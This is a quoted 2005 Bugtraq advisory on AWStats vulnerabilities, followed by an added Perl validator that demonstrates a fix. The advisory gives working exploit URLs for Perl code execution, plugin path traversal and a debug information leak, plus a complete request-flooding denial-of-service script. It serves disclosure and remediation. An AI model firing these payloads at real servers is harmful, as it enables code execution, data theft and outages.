In-Reply-To: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Received: (qmail 16782 invoked from network); 14 Feb 2005 18:00:47 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
> by mail.securityfocus.com with SMTP; 14 Feb 2005 18:00:47 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 01F1F236F68; Mon, 14 Feb 2005 10:27:21 -0700 (MST)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 27084 invoked from network); 14 Feb 2005 00:57:36 -0000
>Date: 14 Feb 2005 08:10:40 -0000
>Message-ID: <20050214081040.3370.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: GHC@xxxxxxxxxxxxxxxxxxxxx,
> [ru]@securityfocus.com@www.securityfocus.com <foster@xxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: AWStats <= 6.4 Multiple vulnerabilities
> Must read AWStats <= 6.3. Version 6.4 is not affected.
>
>
>/*==========================================*/
>// GHC -> AWStats <- ADVISORY
>\\ PRODUCT: AWStats
>// VERSION: <= 6.3
>\\ URL: http://awstats.sourceforge.net/
>// VULNERABILITY CLASS: Multiple vulnerabilities
>\\ RISK: high
>/*==========================================*/
>
>[Product Description]
>"AWStats is a free powerful tool that generates advanced web, ftp or mail server statistics, graphically.
>This log analyzer works as a CGI or from command line and shows you all possible information your log contains,
>in few graphical web pages".
>Current stable version: AWStats 6.3 final
>Development version is 6.4 (2005-02-06 14:31). The 6.4 release is not affected.
>
>[Summary]
>Successful exploitation of an input validation vulnerability in AWStats scripts
>allows attackers to execute limited perl directives under the privileges of
>the web server and get sensitive information.
>Some actions of the attacker can lead to denial of service.
>
>[Details]
>Some AWStats functions can be extended with plugins.
>Two variables (loadplugin & pluginmode) deal with this.
>The first one (loadplugin) is responsible for the plugins list (plugin1, plugin2); the second one
>runs the plugin's functions.
>
>Exploitable example (raw log plugin):
>http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
>
>Server answer:
>192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css HTTP/1.1" 200 2986
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 200 7710
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/logo.gif HTTP/1.1" 200 14443
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200 429
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1" 200 2532
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/vcss.gif HTTP/1.1" 200 1547
>192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 200 7333
>192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1" 200 7588
>192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1" 200 7910
>192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 7340
>192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200 153
>
>The dangerous fact is that an attacker can read sensitive information such as
>IP addresses, admin script names, non-encoded GET queries, etc.
>
>Our variables pass some verification (as others do), but it is not enough for security:
>
>sub Sanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
> return $stringtoclean;
>}
>
>Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.
>It's enough for variables with paths to configuration files, but not for plugin tasks.
>In the case of "loadplugin" & "pluginmode" the developers obviously have a lot of trust in the user.
>
>So, let's see what can be done, in fact.
>
>[1] Perl code execution.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>We'll get the action in the next piece of code:
>
># AWStats output is replaced by a plugin output
>if ($PluginMode) {
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
> if ($? || $@) { error("$@"); }
> &html_end(0);
> exit 0;
>}
>
>If the variable exists, we'll get code execution. This happens after sanitizing (see previous).
>Here we have the interesting part in:
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
>
>This is a subroutine call (as an example, sub BuildFullHTMLOutput_rawlog() from the
>rawlog.pm plugin).
>Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
>But if we don't specify the name of the module (with the "loadplugin" parameter) we'll get the following:
>
>main::BuildFullHTMLOutput_"function name"().
>
>By the way, the symbol ':' is permitted in user input parameters. So, we can send:
>
>PluginMode=:print+getpwent
>
>And $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>This will satisfy eval() requirements, and :print getpwent() is executed.
>
>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>Sanitizing limits the user's input, but there is no filtering for the call symbols '()'.
>Here we can see that somebody can perform a DoS attack.
>This is an example of simple code for successful DoS exploitation:
>
>#!/usr/bin/perl
>
>use IO::Socket;
>$server = 'www.example.com';
>sub ConnectServer {
> $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
> || die "Error\n";
> print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
> print $socket "Host: $server\n";
> print $socket "Accept: */*\n";
> print $socket "\n\n";
>}
>
>while () {
> $rp = rand;
> &ConnectServer;
>}
>
>[BUGFIX]
>Change the vulnerable code to:
>
>sub PluginSanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w]//g;
> return $stringtoclean;
>}
>
>
>[2] Arbitrary plugin inclusion.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
>
>An arbitrary module from user input passed through the "loadplugin" parameter can be included with the "require" function.
>
>Bugfix - as above, or something like this:
>
>opendir (PDIR, './plugins');
>@FilesPDIR = readdir(PDIR);
>closedir (PDIR);
>foreach $FilesPName (@FilesPDIR) {
> if ($FilesPName =~ m/$loadplugin/) {
> }
>}
>
>The good thing is that the poison null-byte (%00) has no place here (it transfers to 00).
>
>[3] Sensitive information leak in AWStats version 6.3 (Stable) - 6.4 (Development).
>Every user can access the debug function:
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
>
>
>[DISCLOSURE TIMELINE]
>
>10-02-2005 Initial vendor notification.
>14-02-2005 No response.
>14-02-2005 Bugtraq post.
>
>/* ================================================== */
>/* www.ghc.ru -- security games & challenges */
>/* ================================================== */
>/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
>/* Special respect to e-defense. */
>/* ================================================== */
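The two [BUGFIX] sketches in the quoted advisory (the `\w`-only `PluginSanitize` and the `opendir` allowlist loop) point in the right direction but, as written, still strip-and-continue and still interpolate user input into a regex. The script below is an added example, not part of the advisory and not AWStats code, showing how a defender would combine both ideas into one validator: a plugin name is accepted only if it is a single anchored bare word and a matching `.pm` file exists in the plugins directory; anything else is rejected rather than "repaired". `ValidatePluginName` is a hypothetical name, the plugins directory is a throwaway temp directory with two fake modules, and the test inputs are constructed (they reuse the two values quoted in the advisory so the contrast with the original `Sanitize` is visible).

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Sanitize() as quoted in the advisory (AWStats <= 6.3), reproduced here only
# so the old and new behaviour can be compared side by side.
sub Sanitize {
    my $stringtoclean = shift;
    $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
    return $stringtoclean;
}

# ValidatePluginName (hypothetical name, not an AWStats function): accept a
# plugin identifier only if it is one bare word AND a module of that name
# exists in the plugins directory. Returns the name, or undef to reject.
sub ValidatePluginName {
    my ($value, $plugindir) = @_;
    return undef unless defined $value;

    # Anchored match with an explicit character class: no ':' (the package
    # separator that lets "BuildFullHTMLOutput_:print getpwent()" parse), no
    # '/', '.', whitespace or '()'. A strip filter (s///g) would silently turn
    # "rawlog()" into "rawlog"; rejecting outright is the safer default.
    return undef unless $value =~ /\A([A-Za-z0-9_]{1,64})\z/;
    my $name = $1;

    # Allowlist built from the directory listing. The user value is compared
    # by hash lookup, never interpolated into a pattern (m/$loadplugin/ would
    # itself be pattern-injectable).
    opendir(my $dh, $plugindir) or return undef;
    my %available = map { /\A([A-Za-z0-9_]+)\.pm\z/ ? ($1 => 1) : () } readdir($dh);
    closedir($dh);

    return exists $available{$name} ? $name : undef;
}

# --- demonstration on constructed input -----------------------------------
# A temp directory stands in for AWStats' ./plugins and holds two fake plugin
# modules so the allowlist has something to match against.
my $plugindir = tempdir(CLEANUP => 1);
for my $p (qw(rawlog hostinfo)) {
    my $path = File::Spec->catfile($plugindir, "$p.pm");
    open(my $fh, '>', $path) or die "cannot create $path: $!";
    print {$fh} "package $p;\n1;\n";
    close($fh);
}

# Constructed inputs: a legitimate plugin, the two values quoted in the
# advisory, a value the old filter would quietly "repair", and a bare word
# that is well-formed but not installed.
my @inputs = (
    'rawlog',
    ':print getpwent',
    '../../../../usr/libdata/perl/5.00503/blib',
    'hostinfo()',
    'notinstalled',
);

for my $in (@inputs) {
    my $old = Sanitize($in);
    my $new = ValidatePluginName($in, $plugindir);
    printf "%-46s Sanitize -> %-46s strict -> %s\n",
        "'$in'", "'$old'", defined $new ? "accept '$new'" : 'reject';
}
```

Run with `perl validate_plugin.pl` (any filename). The table it prints makes the point of the advisory concrete: the original `Sanitize` passes `:print getpwent` and the `../../` path through unchanged because every character in them is on its allowlist, and it turns `hostinfo()` into `hostinfo`, while the strict validator accepts only `rawlog` and rejects the other four. Rejecting (and logging) malformed plugin names instead of cleaning them also gives a detection signal: a request whose `loadplugin` or `pluginmode` value fails the anchored `\w` match is never a legitimate AWStats URL.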